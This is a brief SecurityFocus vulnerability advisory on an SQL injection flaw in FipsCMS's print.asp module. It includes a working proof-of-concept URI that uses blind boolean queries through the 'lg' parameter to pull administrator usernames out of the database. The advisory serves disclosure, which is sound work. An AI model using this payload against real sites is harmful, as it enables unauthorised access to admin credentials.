FipsCMS 'print.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/fipsCMS/modules/print.asp?lg=//IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20admin))='a',0,'ko')


 

Privacy Statement
Copyright 2010, SecurityFocus